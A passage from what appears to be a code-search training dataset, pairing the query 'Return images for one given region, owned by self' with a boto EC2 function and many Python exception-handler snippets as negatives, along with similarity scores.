AuthenticationError):\n logger.error(traceback.format_exc())\n return jsonify(error_response(str(e) or 'Unauthenticated')), 401\n\n # Set LackCourseContext handler\n @app.errorhandler(LackCourseContext)\n def handle_lack_course_context(e: LackCourseContext):\n logger.error(traceback.format_exc())\n return jsonify(error_response(str(e) or 'Please set your course context'))\n\n @app.errorhandler(AssertError)\n def handle_assertion_error(e: AssertError):\n logger.error(traceback.format_exc())\n message, status_code = e.response()\n return jsonify(error_response(message)), status_code", "def process_exception(self, request, exception):\n logging.error(\"ERROR\")\n logging.error(traceback.format_exc())\n response = set_response(\"Internal server error\", False, 500, {})\n return JsonResponse(response, status=response[\"http_code\"])", "def _error_handling(self,e,func):\n print(self.type, \" sufferred exception in \" , func , \":\" , e)", "def handle_exception(e):\n maps = {\n exp.ServiceExp: api_exceptions.ServiceException,\n exp.PermissionExp: api_exceptions.ForbiddenException,\n exp.NotFoundExp: api_exceptions.NotFoundException,\n exp.ValueExp: api_exceptions.BadRequestException,\n exp.BadRequestExp: api_exceptions.BadRequestException,\n }\n raise maps[e.__class__](e.message)", "def custom_exception_handler(exc, context):\n response = exception_handler(exc, context)\n\n return Response(\n str(exc),\n status=response.status_code if response is not None else HTTP_500_INTERNAL_SERVER_ERROR,\n )", "def _exception_handler(self, exception_class, message):\n self.messages.append((exception_class, message))\n raise exception_class(message)", "def register_exceptions(app):\n\n @app.errorhandler(Exception)\n def exceptions(e):\n \"\"\"Exception handler that manages Flask/Werkzeug exceptions.\n\n For the other exception handlers check ``service/decorators.py``\n \"\"\"\n # NOTE: add log entry\n str(getattr(e, \"code\", \"unavailable\"))\n log_error_code = str(getattr(e, \"code\", \"unavailable\"))\n service_log.error(\n f\"{request.remote_addr} {request.method} {request.scheme} {request.full_path}\\n\"\n f\"Error code: {log_error_code}\\n\"\n f\"Stack trace: {traceback.format_exc()}\"\n )\n\n # NOTE: craft user messages\n if hasattr(e, \"code\"):\n code = int(e.code)\n\n # NOTE: return an http error for methods with no body allowed. This prevents undesired exceptions.\n NO_PAYLOAD_METHODS = \"HEAD\"\n if request.method in NO_PAYLOAD_METHODS:\n return Response(status=code)\n\n error: ServiceError\n if code == 400:\n error = ProgramHttpRequestError(e)\n elif code == 404:\n error = ProgramHttpMissingError(e)\n elif code == 405:\n error = ProgramHttpMethodError(e)\n elif code == 408:\n error = ProgramHttpTimeoutError(e)\n else:\n error = ProgramHttpServerError(e, code)\n\n return error_response(error)\n\n # NOTE: Werkzeug exceptions should be covered above, the following line is for\n # unexpected HTTP server errors.\n return error_response(e)", "def hook_server_inspect_exception(self, request_event, reply_event, exc_infos):\r\n task_context = self.hook_get_task_context()\r\n for functor in self._hooks['server_inspect_exception']:\r\n functor(request_event, reply_event, task_context, exc_infos)", "def handle_rest_exceptions(exception):\n current_app.logger.exception(exception)\n return exception.get_response()", "def _catch_all(ctx, *args, **kwargs):\n try:\n return func(ctx, *args, **kwargs)\n except click.Abort:\n # on SIGINT click.prompt raise click.Abort\n logger.error('') # just to get a newline\n # raise all click exceptions because they are used to bail and print a message\n except click.ClickException:\n # dont raise exception if --json was given so no error messages are printed\n # errors are printed in a json format in the json_decorator above\n if \"json\" in ctx.params and ctx.params['json']:\n return\n else:\n raise\n\n except Exception:\n # generic error string\n logger.error(uxstring.UxString.Error.server_err)\n\n # only dump the stack traces if the debug flag is set\n if \"TWO1_DEBUG\" in os.environ:\n logger.error(\"\\nFunction: {}.{}\".format(func.__module__, func.__name__), fg=\"red\")\n logger.error(\"Args: {}\".format(args), fg=\"red\")\n logger.error(\"Kwargs: {}\".format(kwargs), fg=\"red\")\n logger.error(\"{}\".format(traceback.format_exc()), fg=\"red\")", "def baseExceptionHandler(*args):\n\n\theader, frames, trcback = formatReport(*extractException(*args))\n\n\tLOGGER.error(\"!> {0}\".format(Constants.loggingSeparators))\n\tmap(lambda x: LOGGER.error(\"!> {0}\".format(x)), header)\n\n\tLOGGER.error(\"!> {0}\".format(Constants.loggingSeparators))\n\tmap(lambda x: LOGGER.error(\"!> {0}\".format(x)), frames)\n\n\tLOGGER.error(\"!> {0}\".format(Constants.loggingSeparators))\n\tsys.stderr.write(\"\\n\".join(trcback))\n\n\treturn True", "def error_handler(self, e, name, handler):\n msg = '' if handler else ' (no handler)'\n LOGGER.debug('Monitoring error handling %s %s: %s', name, msg, e)\n if handler:\n try:\n handler(e)\n except Exception as handler_exception:\n LOGGER.error('Monitoring exception %s fail: %s', name, handler_exception)\n LOGGER.exception(handler_exception)\n else:\n LOGGER.exception(e)", "def all_exception_handler(handler_input, exception):\n # type: (HandlerInput, Exception) -> None\n print(\"Encountered following exception: {}\".format(exception))\n\n speech = \"Mi dispiace, c'è stato un problema!!\"\n handler_input.response_builder.set_should_end_session(True)\n handler_input.response_builder.speak(speech).ask(speech)\n\n return handler_input.response_builder.response", "def handle_exception(self, exception, debug):\n\n # build our error report\n error_report = {\n 'method': self.request.method,\n 'url': self.request.path_url,\n 'query_string': self.request.query_string,\n # 'data': environ.get('wsgi.input'),\n 'headers': dict(self.request.headers),\n 'env': dict((\n ('REMOTE_ADDR', self.request.environ['REMOTE_ADDR']),\n ('SERVER_NAME', self.request.environ['SERVER_NAME']),\n ('SERVER_PORT', self.request.environ['SERVER_PORT']),\n )),\n }\n interface = 'sentry.interfaces.Http'\n\n try:\n client.captureException(data={interface: error_report})\n except HTTPException:\n logging.warning('Unable to contact sentry server')\n\n # Log the exception\n logging.exception(exception)\n\n # If the exception is a HTTPException, use its error code.\n # Otherwise use a generic 500 error code.\n if isinstance(exception, webapp2.HTTPException):\n self.response.set_status(exception.code)\n status_code = exception.code\n else:\n self.response.set_status(500)\n status_code = 500\n\n # collect our error data\n exc_info = sys.exc_info()\n\n # Set a custom message.\n if status_code == 500:\n self.render_response({'error': 'A server error has occurred'})\n # otherwise return the error message's value\n else:\n self.render_response({'error': str(exc_info[1])})", "def handle_exception(self, e):\n if isinstance(e, exceptions.APIException):\n return e.get_response(self.request)\n else:\n exc = exceptions.OtherException(self.request)\n return exc.get_response(self.request)", "def exceptionhandler(e):\n response = e.get_response()\n response.data = json.dumps({\n \"code\" : e.code,\n \"name\": e.name,\n \"description\": e.description\n })\n response.content_type = \"application/json\"\n\n return response", "def catch_backend_errors(handler, registry):\n def catch_backend_errors_tween(request):\n try:\n return handler(request)\n except BackendError as err:\n logger = get_logger(request)\n err_info = str(err)\n err_trace = traceback.format_exc()\n try:\n extra_info = \"user: %s\" % (request.user,)\n except Exception:\n extra_info = \"user: -\"\n error_log = \"%s\\n%s\\n%s\" % (err_info, err_trace, extra_info)\n hash = create_hash(error_log)\n logger.error(hash)\n logger.error(error_log)\n msg = json.dumps(\"application error: crash id %s\" % hash)\n if err.retry_after is not None:\n if err.retry_after == 0:\n retry_after = None\n else:\n retry_after = err.retry_after\n else:\n settings = request.registry.settings\n retry_after = settings.get(\"mozsvc.retry_after\", 1800)\n\n return HTTPServiceUnavailable(body=msg, retry_after=retry_after,\n content_type=\"application/json\")\n\n return catch_backend_errors_tween", "def exceptions(e):\n ts = strftime('[%Y-%b-%d %H:%M]')\n tb = traceback.format_exc()\n logger.error('%s %s %s %s %s 5xx INTERNAL SERVER ERROR\\n%s',\n ts,\n request.remote_addr,\n request.method,\n request.scheme,\n request.full_path,\n tb)\n return \"Internal Server Error\", 500", "def exception_handler(exc, context):\n if isinstance(exc, NotFoundException):\n exc = exceptions.NotFound()\n elif isinstance(exc, UnauthorizedException):\n exc = exceptions.PermissionDenied()\n elif isinstance(exc, exceptions.NotAuthenticated):\n exc = NotAuthenticated()\n\n if isinstance(exc, exceptions.APIException):\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['Retry-After'] = '%d' % exc.wait\n\n if isinstance(exc.detail, (list, dict)):\n data = exc.detail\n else:\n data = {'detail': exc.detail}\n\n set_rollback()\n return Response(data, status=exc.status_code, headers=headers)\n\n return None", "async def _handle_exception(self, e, sock):\n if isinstance(e, (RemoteProtocolError, AssertionError)):\n await sock.aclose()\n raise BadHttpResponse(\"Invalid HTTP response from server.\") from e\n\n if isinstance(e, Exception):\n await sock.aclose()\n raise e", "def handle_unknown_exception(exception):\n logger.exception(\"Unknown exception encountered:\")\n return Response(\n response=json.dumps(\n {\n \"value\": \"Amplium exception: %s\" % str(exception),\n \"status\": \"ERROR\"\n }\n ),\n status=500,\n mimetype=\"application/json\"\n )", "def _set_exception_hook(logger):\n\n def _hook(exc_type, exc_value, traceback):\n logger.error(\n \"An uncaught exception was raised in the plugin process:\",\n exc_info=(exc_type, exc_value, traceback),\n )\n\n sys.excepthook = _hook", "def exception_handler(exc):\n if isinstance(exc, exceptions.APIException):\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['X-Throttle-Wait-Seconds'] = '%d' % exc.wait\n\n return Response({'error_code': CustomSerializer.get_api_code(exc.detail),\n 'error_message': exc.detail,\n 'errors': []},\n status=exc.status_code,\n headers=headers)\n\n elif isinstance(exc, Http404):\n return Response({'error_code': CustomSerializer.get_api_code('Not found'),\n 'error_message': 'Not found',\n 'errors': []},\n status=status.HTTP_404_NOT_FOUND)\n\n elif isinstance(exc, PermissionDenied):\n return Response({'error_code': CustomSerializer.get_api_code('You do not have permission to perform this action.'),\n 'error_message': 'You do not have permission to perform this action.',\n 'errors': []},\n status=status.HTTP_403_FORBIDDEN)\n\n # Note: Unhandled exceptions will raise a 500 error.\n return None", "def test_exception_in_exception_handler(exception_app):\n request, response = exception_app.test_client.get(\n '/error_in_error_handler_handler')\n assert response.status == 500\n assert response.body == b'An error occurred while handling an error'", "def handleException(self,e):\n # print (\"Handling Exception %s %s\" % (e.__class__.__name__, e.args))\n #\n # general pre-processing\n #\n # add filename to EnvironmentError for printout\n if isinstance(e,EnvironmentError):\n fn = e.filename\n if fn is not None and fn not in e.args: e.args += (fn,)\n #\n # specific processing\n #\n if isinstance(e,TransformError): return self.handleTransformError(e)\n elif isinstance(e,IncludeError): return self.handleIncludeError(e)\n elif isinstance(e,SystemExit): return self.handleSystemExit(e)\n elif isinstance(e,KeyboardInterrupt): return self.handleKeyboardInterrupt(e)\n elif isinstance(e,RuntimeError): return self.handleRuntimeError(e)\n elif type(e) in (AttributeError,NameError,TypeError,SyntaxError):\n return self.handlePythonSyntaxError(e)\n elif isinstance(e,Exception):\n if hasattr(e,'args') and type(e.args) == list and e.args:\n args0 = e.args[0]\n # test for some known strings\n if isinstance(args0, str):\n if args0.find('Failed to load DLL') != -1:\n return self.handleDllLoadError(e)\n # error was not handled\n return None", "def register_error_handlers(app: Flask):\n app.errorhandler(HTTPException)(jsonify_http_exception)\n\n # Don't jsonify an exception in dev mode\n if not app.config.get('DEBUG'):\n app.errorhandler(Exception)(jsonify_unknown_exception)", "def register_default_server_exception_handler(app: FastAPI):\n @app.exception_handler(status.HTTP_500_INTERNAL_SERVER_ERROR)\n async def default_server_exception_handler(request: Request, exception: Exception):\n response = get_response()\n logger.exception(\"Uncaught server exception: {exc}\", exc=exception)\n\n # Since the CORSMiddleware is not executed when an unhandled server exception\n # occurs, we need to manually set the CORS headers ourselves if we want the FE\n # to receive a proper JSON 500, opposed to a CORS error.\n # Setting CORS headers on server errors is a bit of a philosophical topic of\n # discussion in many frameworks, and it is currently not handled in FastAPI.\n # See dotnet core for a recent discussion, where ultimately it was\n # decided to return CORS headers on server failures:\n # https://github.com/dotnet/aspnetcore/issues/2378\n origin = request.headers.get('origin')\n\n if origin:\n # Have the middleware do the heavy lifting for us to parse\n # all the config, then update our response headers\n cors = CORSMiddleware(\n app=app,\n allow_origins=opal_common_config.ALLOWED_ORIGINS,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"])\n\n # Logic directly from Starlette's CORSMiddleware:\n # https://github.com/encode/starlette/blob/master/starlette/middleware/cors.py#L152\n\n response.headers.update(cors.simple_headers)\n has_cookie = \"cookie\" in request.headers\n\n # If request includes any cookie headers, then we must respond\n # with the specific origin instead of '*'.\n if cors.allow_all_origins and has_cookie:\n response.headers[\"Access-Control-Allow-Origin\"] = origin\n\n # If we only allow specific origins, then we have to mirror back\n # the Origin header in the response.\n elif not cors.allow_all_origins and cors.is_allowed_origin(origin=origin):\n response.headers[\"Access-Control-Allow-Origin\"] = origin\n response.headers.add_vary_header(\"Origin\")\n\n return response", "def exception_handler(exc, context):\n headers = None\n if isinstance(exc, APIException):\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['Retry-After'] = '%d' % exc.wait\n\n data = exc.detail\n if type(data) is ErrorDetail:\n data = str(data)\n status_code = exc.status_code\n set_rollback()\n\n elif isinstance(exc, Http404):\n data = \"Not Found\"\n status_code = status.HTTP_404_NOT_FOUND\n set_rollback()\n\n else:\n data = str(exc)\n status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n\n return smart_response(data, status_code=status_code, headers=headers)", "def api_exception_handler(e):\n ep = request.url\n log.error(\"An error occured talking to k8s while working on %s: %s\", ep, e)\n\n if e.status == 404:\n msg = \"The requested resource could not be found in the API Server\"\n else:\n msg = utils.parse_error_message(e)\n\n return api.failed_response(msg, e.status)", "def handle_exception(self,exc):\n logger.error(f\"Exception in request: {traceback.format_exc()}\")\n status_obj = status.HTTP_400_BAD_REQUEST\n if type(exc) is response.Http404:\n status_obj = status.HTTP_404_NOT_FOUND\n return Response(\n MediaUtil.generate_error_image(\n status_obj,\n str(exc),\n self.request.accepted_renderer.format),\n status=status_obj)", "def log_all_exceptions(logger):\n def outer(func):\n @wraps(func)\n def inner(*args, **kwds):\n try:\n return exception_stack_catcher(func)(*args, **kwds)\n except Exception as err:\n log_wrapped_exception(logger, err)\n raise\n return inner\n return outer", "def custom_exception_handler(exc, context):\n response = exception_handler(exc, context)\n if isinstance(exc, Http404):\n response.data = {\n 'message': 'No data available' # custom exception message\n }\n return response\n try:\n print(\"Exception\", exc.get_codes())\n if 'email' in exc.get_codes() and 'unique' in exc.get_codes()['email']:\n response.data = {\n 'message': 'This email already exists.' # custom exception message\n }\n return response\n if 'mobile_number' in exc.get_codes() and 'unique' in exc.get_codes()['mobile_number']:\n response.data = {\n 'message': 'This mobile number already exists.' # custom exception message\n }\n return response\n if 'dev_id' in exc.get_codes() and 'unique' in exc.get_codes()['dev_id']:\n response.data = {\n 'message': 'This device already registered with other account.' # custom exception message\n }\n return response\n return response\n except:\n return response", "def handle_exception(exc_type, exception, traceback):\n report(UNKNOWN, \"unhandled exception: %s\" % (exception,))", "def handle_adminexceptions(bot, event):\n from jsb.utils.exception import exceptionlist, exceptionevents\n for e, ex in exceptionevents: logging.warn(\"%s - exceptions raised is %s\" % (e.bot.cfg.name, ex))\n event.reply(\"exceptions raised: \", exceptionlist)", "def catch_error(\n exception=None, catch_generic=True,\n exception_label=None,\n # TO FIX: where have this gone??\n # error_code=None,\n **kwargs):\n\n if exception_label is None:\n exception_label = ''\n if len(exception_label) > 0:\n exception_label += ': '\n if exception is None:\n exception = RestApiException\n\n def decorator(func):\n @wraps(func)\n def wrapper(self, *args, **kwargs):\n out = None\n\n try:\n out = func(self, *args, **kwargs)\n\n # Catch the single exception that the user requested\n except exception as e:\n\n message = exception_label + str(e)\n if hasattr(e, \"status_code\"):\n error_code = getattr(e, \"status_code\")\n return send_error(self, message, error_code)\n else:\n return send_error(self, message)\n\n # Catch the basic API exception\n except RestApiException as e:\n\n if catch_generic:\n return send_error(self, e, e.status_code)\n else:\n raise e\n\n # Catch any other exception\n except Exception as e:\n if catch_generic:\n return send_error(self, e)\n else:\n raise e\n\n return out\n return wrapper\n return decorator", "def log_exception():\n logging.basicConfig(level=logging.DEBUG)\n return logging.getLogger('exceptions_log')", "def handleExceptionsWrapper(*args, **kwargs):\n\n\t\t\t_exceptions__frame__ = True\n\n\t\t\ttry:\n\t\t\t\treturn object(*args, **kwargs)\n\t\t\texcept exceptions as error:\n\t\t\t\tfor handler in handlers:\n\t\t\t\t\thandler(error)", "def log_exception(*args, **kwds):\n cls, err = sys.exc_info()[:2]\n logging.exception('Exception in request: %s: %s', cls.__name__, err)", "def handle_expt(self):\r\n self._perform_on_error_handling()", "def _on_exception(self, exception):\n pass", "def exception_handler(engine):\n try:\n yield\n except KeyboardInterrupt:\n spooky_season = [\":skull:\", \":vampire:\", \":zombie:\", \":jack-o-lantern:\"]\n console.print(random.choice(spooky_season))\n except botocore.exceptions.BotoCoreError as e:\n console.log(\"BotoCoreError: \", e)\n except ParseException as e:\n console.log(\"Engine: ParseException\")\n syntax = Syntax(\n engine.pformat_exc(e),\n \"sql\",\n theme=\"monokai\",\n line_numbers=True,\n word_wrap=True,\n )\n console.print(Panel(syntax, title=\"Engine Details\", expand=False))\n except EngineRuntimeError as e:\n console.log(e)\n except SyntaxError as e:\n console.log(e)\n except Exception:\n console.print_exception()", "def _propagate_exc(self):\n catch_op = self._find_handler()\n if catch_op:\n # Exception caught! Transfer control to block\n catch_block = catch_op.parent\n self.pc = self.blockstarts[catch_block.name]\n else:\n # No exception handler!\n raise UncaughtException(self.exception)", "def _handle_error(self, exc: BaseException, reraise: bool = True) -> None:\n if self._breaker.is_system_error(exc):\n self._breaker._inc_counter()\n for listener in self._breaker.listeners:\n listener.failure(self._breaker, exc)\n self.on_failure(exc)\n else:\n self._handle_success()\n\n if reraise:\n raise exc", "def on_exception(self):\n pass", "def log_exceptions(args, *exc_types):\n try:\n yield\n except Exception as error:\n for exc_type in exc_types:\n if isinstance(error, exc_type):\n Logger.debug(str(error))\n args.exit = 1\n break\n else:\n raise", "def handle(self, exception):\n # By default, when reporting errors, err on the side of\n # terseness, to avoid leaking sensitive information.\n debug = self.app.config['DEBUG'] or self.debug\n\n if hasattr(self.app, 'manager') and hasattr(self.app.manager, '_db'):\n # There is an active database session.\n\n # Use it to determine whether we are in debug mode, in\n # which case we _should_ provide the client with a lot of\n # information about the problem, without worrying\n # whether it contains sensitive information.\n _db = self.app.manager._db\n try:\n LogConfiguration.from_configuration(_db)\n (log_level, database_log_level, handlers,\n errors) = LogConfiguration.from_configuration(\n self.app.manager._db\n )\n debug = debug or (\n LogConfiguration.DEBUG in (log_level, database_log_level)\n )\n except SQLAlchemyError as e:\n # The database session could not be used, possibly due to\n # the very error under consideration. Go with the\n # preexisting value for `debug`.\n pass\n\n # Then roll the session back.\n self.app.manager._db.rollback()\n tb = traceback.format_exc()\n\n if isinstance(exception, DatabaseError):\n # The database session may have become tainted. For now\n # the simplest thing to do is to kill the entire process\n # and let uwsgi restart it.\n logging.error(\n \"Database error: %s Treating as fatal to avoid holding on to a tainted session!\",\n exception, exc_info=exception\n )\n shutdown = flask.request.environ.get('werkzeug.server.shutdown')\n if shutdown:\n shutdown()\n else:\n sys.exit()\n\n # By default, the error will be logged at log level ERROR.\n log_method = logging.error\n\n # Okay, it's not a database error. Turn it into a useful HTTP error\n # response.\n if hasattr(exception, 'as_problem_detail_document'):\n # This exception can be turned directly into a problem\n # detail document.\n document = exception.as_problem_detail_document(debug)\n if not debug:\n document.debug_message = None\n else:\n if document.debug_message:\n document.debug_message += \"\\n\\n\" + tb\n else:\n document.debug_message = tb\n if document.status_code == 502:\n # This is an error in integrating with some upstream\n # service. It's a serious problem, but probably not\n # indicative of a bug in our software. Log it at log level\n # WARN.\n log_method = logging.warn\n response = make_response(document.response)\n else:\n # There's no way to turn this exception into a problem\n # document. This is probably indicative of a bug in our\n # software.\n if debug:\n body = tb\n else:\n body = _('An internal error occured')\n response = make_response(str(body), 500, {\"Content-Type\": \"text/plain\"})\n\n log_method(\"Exception in web app: %s\", exception, exc_info=exception)\n return response", "def add_basic_error_handlers(app: Flask):\n app.register_error_handler(InternalServerError, error_handling_router)\n app.register_error_handler(BadRequest, error_handling_router)\n app.register_error_handler(HTTPException, error_handling_router)\n app.register_error_handler(NotFound, error_handling_router)\n app.register_error_handler(Exception, error_handling_router)", "def handling_unknown_err(e):\n app.logger.exception(e)\n return resp_json(BaseResp.err(e.name))", "def catch_exception(*args):\n from ..operators.observable.catch import catch_exception_\n return catch_exception_(*args)", "def _handle_exceptions(f):\n\n @wraps(f)\n def wrapper(self, *args, **kwargs):\n try:\n return f(self, *args, **kwargs)\n except Exception as err:\n logger.exception(\n f\"{type(self).__name__}.{f.__name__}(*{args!r}, **{kwargs!r}) failed\"\n )\n content = self.message.content\n self.reply(f\"Oops, the {content} command encountered a problem: {err!r}\")\n\n wrapper._handle_exceptions = True\n return wrapper", "def custom_exception_handler(exception, context):\n traceback.print_exception(*sys.exc_info())\n response = exception_handler(exception, context)\n\n if isinstance(exception, GenericException):\n response = build_response(exception.status_code, exception.detail)\n\n if isinstance(exception, ObjectDoesNotExist):\n response = build_response(status.HTTP_400_BAD_REQUEST,\n str(exception)\n if str(exception).strip()\n else constants.OBJECT_NOT_FOUND_MESSAGE)\n\n if isinstance(exception, ValueError):\n response = build_response(status.HTTP_400_BAD_REQUEST,\n str(exception)\n if str(exception).strip()\n else constants.VALUE_ERROR_MESSAGE)\n\n if isinstance(exception, ValidationError):\n response = build_response(status.HTTP_400_BAD_REQUEST,\n str(exception)\n if str(exception).strip()\n else constants.VALIDATION_ERROR_MESSAGE)\n\n if response is None:\n response = build_response(status.HTTP_500_INTERNAL_SERVER_ERROR,\n constants.SERVER_ERROR_MESSAGE)\n\n response.data['message'] = response.data['detail']\n del response.data['detail']\n return response", "def handle_500(e):\n try:\n raise e\n except:\n return traceback.format_exc(), 500", "def log_exception(e):\n logger.exception(e)\n raise", "def exception_handler(self, handler):\n self.java_obj.exceptionHandler(ExceptionHandler(handler))\n return self", "def exception(self, message, *args, **kwargs):\n\n self.logger.exception(message, *args, **kwargs)", "def exception_handler(res):\n try:\n res_data = res.json()\n error_code = res_data['status']\n error_msg = build_error_msg(res_data['errors'])\n exception = DemistoException(ERROR_TITLES.get(error_code, '') + error_msg)\n\n except Exception:\n exception = DemistoException(f'Error in API call [{res.status_code}] - {res.reason}')\n\n raise exception", "def error_handler_middleware(app):\n def wsgi_app(environ, start_response):\n try:\n return app(environ, start_response)\n except Exception, e:\n logging.exception(e)\n # ... display a custom error message ...\n response = webapp.Response()\n response.set_status(500)\n response.out.write('Ooops! An error occurred...')\n response.wsgi_write(start_response)\n return ['']\n\n return wsgi_app", "def exception(self, *args, **kwargs):", "def handle_exception(e):\n # start with the correct headers and status code from the error\n response = e.get_response()\n # replace the body with JSON\n response.data = json.dumps({\n \"code\": e.code,\n \"name\": e.name,\n \"description\": e.description,\n })\n print(response.data)\n response.content_type = \"application/json\"\n return response", "def on_exception(self):\n\n def decorator(coro):\n self._hooks.append((\"exception\", coro))\n return coro\n\n return decorator", "def handle_exception(exc_type, exc_value, exc_traceback):\n if issubclass(exc_type, KeyboardInterrupt):\n sys.__excepthook__(exc_type, exc_value, exc_traceback)\n return\n\n log.error(\"Uncaught exception\", exc_info=(exc_type, exc_value,\n exc_traceback))", "def init_error_handler(app):\n app.register_error_handler(Exception, global_handler)\n return app", "def exc_handler(self, exc_type, exc, *args) -> None:\n self.exception = exc\n self.exit_code = 1", "def log_exception(sender, exception, **extra):\n app.logger.error('Error in Geocoding Service: %s', exception)", "def logged_errors(func):\n @wraps(func)\n def wrapper(*args, **kwrds):\n try:\n return func(*args, **kwrds)\n except:\n etype, evalue, etrace = sys.exc_info()\n app_logger().error(\"ERROR HANDLER => %s: %s\\n%s\\n\", etype, evalue, etrace)\n return abort(500)\n return wrapper", "def exception(msg):\n log('EXCEPTION', msg)", "def jsonify_unknown_exception(exception: Exception):\n current_app.logger.exception('Unhandled exception has been raised!')\n return jsonify(DEFAULT_MESSAGE, 500)", "def raise_exception(request):\n raise Exception(\"Let's test error handling\")", "async def on_handle_message_error(self, message: andesite.ReceiveOperation, exc: Exception) -> None:\n log.error(f\"uncaught error {exc} in {self} when handling message {message}\")", "def exception(self, msg, *args, **kwargs):\n ex = sys.exc_info()[1]\n\n if hasattr(ex, '_monocle'):\n args = args + (format_tb(ex),)\n self.logger.error('%s\\n%%s' % msg, *args, **kwargs)\n else:\n super(Adapter, self).exception(msg, *args, **kwargs)", "def exception_handler(result, name=\"\"):\n try:\n response_content = result.json()\n # pylint: disable=broad-except\n except Exception:\n response_content = result.text\n\n exc_map = {\n 300: SFDC_MoreThanOneRecord,\n 400: SFDC_MalformedRequest,\n 401: SFDC_ExpiredSession,\n 403: SFDC_RefusedRequest,\n 404: SFDC_ResourceNotFound,\n }\n exc_cls = exc_map.get(result.status_code, SFDC_GeneralError)\n\n raise exc_cls(result.url, result.status_code, name, response_content)", "def exception_handler(exctype, val, trace):\n logger.info(\n ''.join(traceback.format_exception(exctype, val, trace)))", "def simplecatcher(application):\n def simplecatcher_app(environ, start_response):\n try:\n return application(environ, start_response)\n except:\n out = StringIO()\n traceback.print_exc(file=out)\n start_response('500 Server Error',\n [('content-type', 'text/html')],\n sys.exc_info())\n res = out.getvalue()\n return ['<h3>Error</h3><pre>%s</pre>'\n % html_quote(res)]\n return simplecatcher_app", "def error_handler(driver, all_loggers, retrydict, msg, testcase=None):\n totals = dict(passed=0, failed=0, executed=0, total=0)\n logger = all_loggers[0]\n try:\n yield\n except (selexcept.NoSuchElementException, selexcept.ElementNotVisibleException,\n selexcept.StaleElementReferenceException, selexcept.WebDriverException,\n exceptlib.ListOrderComparisonError, exceptlib.TextNotFoundError, IndexError), error:\n loglib.logErrors(all_loggers, retrydict, traceback.format_exc(), msg, error)\n if testcase: logger.info(testcase)\n except Exception, error:\n driver.quit()\n loglib.logTotalTestResults(totals, logger, gorked=True)\n loglib.logErrors(all_loggers, retrydict, traceback.format_exc(), msg, error)\n logger.info('-=' * 30 + '-')\n sys.exit(1)" ]
[ "0.71580285", "0.69891423", "0.68551576", "0.68176335", "0.66826653", "0.65763485", "0.6536817", "0.6521186", "0.6516178", "0.65054154", "0.64914984", "0.6473506", "0.6451797", "0.6449465", "0.64328057", "0.63658404", "0.6359318", "0.6342113", "0.632365", "0.6301916", "0.6286596", "0.62711996", "0.62704885", "0.6266336", "0.6250016", "0.6243729", "0.6236881", "0.6228097", "0.62198865", "0.62172794", "0.62061685", "0.6186442", "0.6160992", "0.615859", "0.61416614", "0.6140795", "0.61390007", "0.6124955", "0.61165744", "0.61159587", "0.6114323", "0.6105731", "0.6090698", "0.60760367", "0.60758007", "0.6073987", "0.60580343", "0.6046357", "0.60446805", "0.60432774", "0.60424095", "0.6030432", "0.6020261", "0.60139287", "0.5989537", "0.5982617", "0.5969156", "0.59537643", "0.5951111", "0.5940716", "0.5930293", "0.5921563", "0.5913937", "0.5911834", "0.5907317", "0.5907104", "0.59042394", "0.5882256", "0.58555144", "0.58553505", "0.5837034", "0.5821295", "0.58170885", "0.5815853", "0.5813546", "0.58134127", "0.5809713", "0.58086544", "0.5808306", "0.5806344", "0.5803658", "0.5799172", "0.5798229", "0.5793174", "0.57802635", "0.5769823", "0.5767941", "0.5753668", "0.57504094", "0.57487404", "0.57432145", "0.574288", "0.57414263", "0.57410526", "0.57402635", "0.5734592", "0.57327706", "0.57232535", "0.570902", "0.570756" ]
0.5860892
68
Return images for one given region, owned by self
def getImages(region): creds = credentials() try: conn = ec2.connect_to_region(region, **creds) images = conn.get_all_images(owners=['self']) except boto.exception.EC2ResponseError: return [] return images
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getregion(self, *args, **kwargs):\n return _image.image_getregion(self, *args, **kwargs)", "def get_image_by_version(self, region, version=None):\n pass", "def get_images(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_images = conn.get_all_images(owners=['self'])\n except boto.exception.EC2ResponseError:\n return []\n return region_images", "def getImagesD(region):\n images = getImages(region)\n imageDicts = []\n for im in images:\n imageDict = {\"name\": im.name,\n \"id\": im.id,\n \"region\": im.region.name,\n \"state\": im.state,\n \"created\": im.creationDate,\n \"type\": im.type,\n \"KEEP\": getKeepTag(im),\n \"name_tag\": get_name_tag(im),\n \"snapshots\": getSnapshotsOf(im),\n \"description\": im.description,\n \"PROD\": isProduction(im)\n }\n imageDicts.append(imageDict)\n return imageDicts", "def split(self):\n sub_images = []\n\n for region in regionprops(self.cells):\n minr, minc, maxr, maxc = region.bbox\n sub_image = self.image_raw[max(0, minr - 10):maxr, max(0, minc - 10):maxc, :]\n\n sub_images.append(FQimage(data=sub_image))\n\n return sub_images", "def image(self, name=None):\n return self.find(self.images(), name=name)", "def region(self):\n return regions.lookup(self.state)", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUS2IUS2_GetImageRegion(self)", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIUS2ISS2_GetImageRegion(self)", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterIF2IUS2_GetImageRegion(self)", "def get_texture(images, region_points, texture_size=256):\n\n # Build a (4,2) array of X/Y texture coordinates for a\n # texture_size x texture_size square. The coordinates should\n # start at the top left (0,0) and proceed clockwise.\n\n for image, rect_points in zip(images, region_points):\n # Find a homography that warps the points for the current region to the\n # texture coordinates.\n\n # Warp the image with the homography to obtain the texture for this\n # image and append it to the list of textures.\n pass\n\n # Return the mean texture across the images.\n return None", "def GetImageRegion(self) -> \"itkImageRegion2 const &\":\n return _itkScalarImageKmeansImageFilterPython.itkScalarImageKmeansImageFilterISS2IUS2_GetImageRegion(self)", "def GetImageRegion(self) -> \"itkImageRegion2 const 